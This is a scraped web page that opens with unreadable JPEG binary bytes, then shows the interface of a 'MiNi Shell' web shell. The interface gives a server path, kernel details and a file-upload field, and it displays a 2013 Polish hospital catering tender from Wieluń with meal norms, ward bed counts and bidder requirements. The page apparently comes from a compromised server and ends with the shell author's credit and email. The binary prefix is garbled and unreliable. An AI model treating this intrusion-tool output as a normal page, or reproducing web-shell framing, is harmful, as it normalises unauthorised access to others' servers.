JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130130/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130130/15861-N-2013.html

<p class="kh_header"><b>Wieluń: Usługa codziennego  przygotowywania i dostarczania wyżywienia dla pacjentów Szpitala - catering.</b><br>
<b>Numer ogłoszenia: 15861 - 2013; data zamieszczenia: 30.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Wieluniu , ul. Szpitalna 16, 98-300 Wieluń, woj. łódzkie, tel. +48 043 8438311 w. 355, faks 043 843 83 11 wew. 213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.powiat.wielun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa codziennego  przygotowywania i dostarczania wyżywienia dla pacjentów Szpitala - catering..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest:
1.1.usługa codziennego  przygotowywania i dostarczania wyżywienia dla   pacjentów Szpitala - catering.
1.2. Usługa przygotowania  posiłków w okresie zimowym ( 1 listopada  - 31 marca) zgodnie z rozporządzeniem Rady Ministrów z dnia 28.05.1996 r. oraz Zarządzeniem Dyrektora SPZOZ w Wieluniu w sprawie posiłków regeneracyjnych Nr  32 z dnia 27.10.2006 roku   w ilości  500  obiadów w tym okresie.
1.3. Dotyczy pkt 1.1. Wykonawca  gwarantuje, że   przygotowanie  posiłków  będzie  przeprowadzane  zgodnie  z  warunkami    określonymi  w  ustawie  z 25 sierpnia  2006 r. o bezpieczeństwie żywności  i  żywienia ( Dz. U z 2006 r. Nr 171,    poz. 1225 )
1.4. Każdy posiłek podstawowy (śniadanie, obiad i kolacja) z tzw. diety normalnej zgodnie z  załącznikiem  nr 6,   
musi  zawierać dostateczną ilość  produktów białkowych oraz dodatek warzyw lub owoców. Wartość    kaloryczna  posiłków ogółem powinna  się  mieścić w  granicach 2300 - 2400 kcal,  w tym białko  ogółem  80g, 
 w tym  białko   zwierzęce - 45g, tłuszcze - 80g, węglowodany - 325g.
 Wartość  kaloryczna  poszczególnych  posiłków  winna  mieścić  się  w  następujących   przedziałach :
        W przypadku  diet cukrzycowych dla chorych  przyjmujących  insulinę oraz  diety  dziecięcej  należy    
        przewidzieć  również  II  śniadanie, podwieczorek.
      - śniadanie -690 - 805 kcal, co  stanowi  30-35 % rozdziału całodziennego  zapotrzebowania    
        energetycznego  na  poszczególne  posiłki.
      - II śniadanie -  115 - 120 kcal, co  stanowi   5 % rozdziału całodziennego  zapotrzebowania energetycznego  
        na  poszczególne  posiłki
      - obiad -  805 - 920 kcal, co  stanowi  35 - 40 % rozdziału całodziennego  zapotrzebowania energetycznego  na  
        poszczególne  posiłki
      - podwieczorek - 115 - 120 kcal, co  stanowi   5 % rozdziału całodziennego  zapotrzebowania energetycznego  
        na  poszczególne  posiłki
      - kolacja - 575 - 690 kcal, co  stanowi  25 - 30 % rozdziału całodziennego  zapotrzebowania energetycznego  
        na poszczególne  posiłki.
1. 5. Realizacja średnich  norm  żywieniowych  według  grup  produktów  przedstawiać  się  musi  następująco : 
   - produkty zbożowe - 400g
   - mleko i produkty mleczne - 500g
   - jaja - 15g 
   - mięso, wędliny i ryby - 140g
   - masło i śmietana - 30g
   - inne tłuszcze - 35g
   - ziemniaki - 400g
   - warzywa i owoce z witamina C - 200g
   - warzywa z karotenem - 130g
   - inne  warzywa i owoce - 300g
   - strączkowe suche - 10g
  - cukier i słodycze - 55g
1. 6. Do posiłków : śniadanie  - należy przewidzieć kawę mleczną lub zupę mleczną, 
                               obiad - kompot lub kisiel płynny itp.
                               kolacja - należy planować herbatę wraz z cukrem.
Gramatura  mięsa  na  obiad podawana  z  sosem powinna  wynosić - 120g, bez  sosu - 100g. Dodatki  do  obiadu  w  postaci  surówek  roślinnych  lub  warzyw  gotowanych muszą  wynosić  co  najmniej  120g. 
Posiłki gorące, dostarczane muszą być w temp. zupy   75 0C, II danie 63 0C, surówki 4 0C.
1. 7. Przygotowywanie posiłków odbywać się musi z uwzględnieniem diet stosowanych w tutejszym szpitalu, oraz     
zgodnie ze zleceniami lekarzy, wg zamówień z poszczególnych oddziałów (wykaz stosowanych diet w załączeniu).
1. 8. Zamawianie posiłków na dany dzień realizowane będzie przez uprawnionych pracowników Szpitala.
1. 9.  Posiłki należy dostarczać wg ustalonego harmonogramu, w osobnych naczyniach (termosach) z oznaczeniem oddziału dla którego jest dostawa i ilością porcji. Termosy wraz z wkładami zabezpiecza Wykonawca.
1. 10.  Do obowiązków Wykonawcy należy dostarczenie indywidualnych naczyń na posiłki oraz  sztućcy.
1. 11.  Zapotrzebowania na posiłki dla pacjentów przyjmowanych do Szpitala w godzinach :
      a)16:00 dnia poprzedniego,  do godz.-7:00 dnia którego zamówienie dotyczy zgłaszane  będą Wykonawcy  
         telefonicznie ,do godziny 7:15 , a następnie potwierdzane pisemnie  (FAX), śniadanie i  II śniadanie   
       b)dla pacjentów przyjętych do Szpitala w godzinach 7:00 - 11:00 zgłaszane będą  Wykonawcy telefonicznie do 
          godziny 11:15 i również potwierdzane pisemnie (FAX), obiad , podwieczorek
      c)dla pacjentów przyjętych do Szpitala w godzinach 11:00 - 16:00 zgłaszane będą   Wykonawcy telefonicznie do  
         godziny 16:15 i również potwierdzane pisemnie(FAX),  Kolacja
1. 12.  Wykonawca zobowiązany będzie do sporządzania dekadowych jadłospisów w oparciu o aktualne przepisy   prawne obowiązujące przy ustalaniu racji pokarmowych w całodziennym  wyżywieniu określonych grup ludności    - Szpitale. 
1. 13.  Jadłospis winien być przedstawiony do akceptacji Zamawiającego z 4 dniowym  wyprzedzeniem. Należy   uwzględnić przygotowywanie posiłków tradycyjnych w okresach  świątecznych.
1. 14.  Do Wykonawcy należało będzie prowadzenie ewidencji wydawanych posiłków (dokument WZ) z podziałem na  diety oraz oddziały, potwierdzane każdorazowo imiennie przez uprawnione osoby, Zamawiający zastrzega   
sobie prawo do kontroli zgodności  rachunków z ewidencją tych posiłków.
1. 15.  Zakupy surowców Wykonawca realizował będzie w punktach, które zapewniają ich  wysoką  jakość, zupy 
 powinny być przygotowywane na bazie produktów naturalnych bez  użycia  półproduktów (np. zupy w proszku).
1. 16.  W przypadku zastosowania innych technologii produkcji posiłków niż wymagane lub zalecane stosownymi 
 przepisami Wykonawca musi uzyskać zgodę Powiatowej Stacji Sanitarno-Epidemiologicznej na ich stosowanie. Zamawiający zastrzega sobie prawo  bieżącej kontroli w zakresie przestrzegania przez Wykonawcę przepisów dotyczących technologii produkcji i  jakości wykonywanych usług.
1. 17.  Obowiązkiem Wykonawcy  będzie  : 
- Wykonawca wykaże zatrudnienie dietetyka z minimum 3 letnim stażem pracy w zawodzie dietetyka, 
- Wykonawca przygotowując ofertę zobowiązany jest  zapewnić obsadę w miejscu dystrybucji posiłków  u 
  Zamawiającego,
- dostarczanie posiłków do pomieszczenia dystrybucji  w Szpitalu,
- mycie termosów  wraz z wkładami po wydaniu posiłków,
- utrzymywanie  czystości i porządku  oraz  odpowiedniego  stanu  sanitarno - technicznego  pomieszczenia  do   
  dystrybucji  posiłków
- przechowywanie próbek pokarmowych ze wszystkich  wykonanych i dostarczonych posiłków każdego dnia przez  
  okres 72 godzin z  oznaczeniem daty, godziny, zawartości próbki pokarmowej z podpisem osoby  odpowiedzialnej 
  za pobieranie tych próbek. 
- utylizacja odpadków żywnościowych
1. 18.  Do oferty należy dołączyć przykładowy jadłospis dekadowy dla diety podstawowej tzw. normalnej  wraz z gramaturą oraz  ich  wartością  kaloryczną. W  jadłospisie  dekadowym nie  powinny  się  powtarzać  tzw. potrawy  podstawowe  w każdym z posiłków zatwierdzony - podpisany przez dietetyka Wykonawcy.

     Jadłospis  należy  przygotować  zgodnie  z  poniższą  tabelą : 

DZIEŃ I
ŚNIADANIE :	Waga :	Wartość kaloryczna :
1.
2.
3.
4.
5.
6.		
Razem wartość kaloryczna :	
II  ŚNIADANIE :		
1.
2.
3.		
                                                                   Razem wartość kaloryczna:	
OBIAD :	Waga :	Wartość kaloryczna :
1.
2.
3.
4.
5.		
Razem wartość kaloryczna :	
PODWIECZOREK:		
1.
2.
3.		
                                                                   Razem wartość kaloryczna :	
KOLACJA :	Waga :	Wartość kaloryczna :
1.
2.
3.
4.
5.		
Razem wartość kaloryczna :	
Razem  dzienna  wartość kaloryczna  posiłków :	
1. 19.  Ilość oddziałów do których będą  dostarczane posiłki  - 11

 - Ilość łóżek w oddziałach:
1.Oddział Internistyczny o p. Ogólnym 		- szt 40
2.Oddział Internistyczny o p. Kardiologicznym	- szt 40
3.Oddział Pulmonologii  			              - szt 39
4.Oddział Dziecięcy				- szt 22
5.Oddział Chirurgii Ogólnej			- szt 23
6.Oddział Chirurgii Dziecięcej			- szt 20 
7.Oddział Chirurgii Urazowo-Ortopedycznej		- szt 20
8.Oddział Położniczo-Ginekologiczny		- szt 42
9.Oddział Anestezjologii i Intensywnej Terapii	- szt   5
10.Szpitalny Oddział Ratunkowy			- szt   6
11.Oddział Rehabilitacji				- szt 20
Ilość łóżek  ogółem                                                    - szt 277
 
1.20.  Posiłki dla pacjentów muszą być dostarczone do Szpitala o ściśle określonych porach dnia, w związku z ustalonymi godzinami ich podawania :
- śniadanie dostarczyć do 7:30 , podanie 8:00 do 9:00
- II śniadanie dostarczyć do 7:30 , podanie  10:00
- obiad  dostarczyć do 11:30 podanie od 12:00 do 13:00
- podwieczorek dostarczyć do 11:30 podanie 15:00
- kolacja dostarczyć do 16:30 podanie od 17:00 do 18:00 

1.21	 średnia planowana ilość posiłków                               -  75.000  osobodni 
          Średnia planowana ilość: II śniadanie                       -  11.000  posiłków
          Średnia planowana ilość: Podwieczorek                   -  11.000  posiłków
          Średnia planowana ilość posiłków regeneracyjnych  -        500 posiłków.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.32.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Zamawiający uzna, iż Wykonawca spełnia warunek posiadania uprawnień do wykonywania działalności będacej przedmiotem niniejszego zamówienia po złożeniu wraz z ofertą : -aktualnego odpisu z właściwego rejestru na prowadzenie działalności gospodarczej w zakresie objętym zamówieniem wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert -zaświadczenia o wpisie do rejestru zakładów podlegających urzędowej kontroli organów Państwowej Inspekcji Sanitarnej, zgodnie z art. 62 ustawy z dnia 25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia (Dz.U.06.171.1225 z zm.),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek posiadania wiedzy i doświadczenia na podstawie WYKAZU wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie 3 ostatnich trzech lat przed upływem terminu składania ofert, (a jeżeli okres wykonywania działalności jest krótszy - w tym okresie) co najmniej jednej usługi w zakresie żywienia pacjentów zakładów opieki zdrowotnej o wartości brutto nie mniejszej niż 500.000,00 ( SŁOWNIE: PIĘĆSET TYSIĘCY ZŁOTYCH) - ZAŁĄCZNIK NR 7.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia na podstawie załączonych dokumentów : - WYKAZ NIEZBĘDNYCH DO WYKONANIA ZAMÓWIENIA POJAZDÓW (Załącznik Nr 8 do SIWZ), - WYKAZ OSÓB KTÓRYMI DYSPONUJE WYKONAWCA (Załącznik Nr 9 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia na podstawie załączonych dokumentów : - WYKAZ NIEZBĘDNYCH DO WYKONANIA ZAMÓWIENIA POJAZDÓW (Załącznik Nr 8 do SIWZ), - WYKAZ OSÓB KTÓRYMI DYSPONUJE WYKONAWCA (Załącznik Nr 9 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek odpowiedniej sytuacji ekonomicznej i finansowej na podstawie dołączonej Polisy, a w przypadku jej braku - innego dokumentu potwierdzającego że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności będącej przedmiotem zamowienia, na sumę gwarancyjną nie niższą niż 100.000,00 PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - odległość - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.powiat.wielun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dziale OiZP pokój 204 - nieodpłatnie SPZOZ w Wieluniu, ul. Szpitalna 16, 98-300 Wieluń...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.02.2013 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Wieluniu, ulica Szpitalna 16 , 98 - 300 Wieluń - SEKRETARIAT POKÓJ nr 216.......</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com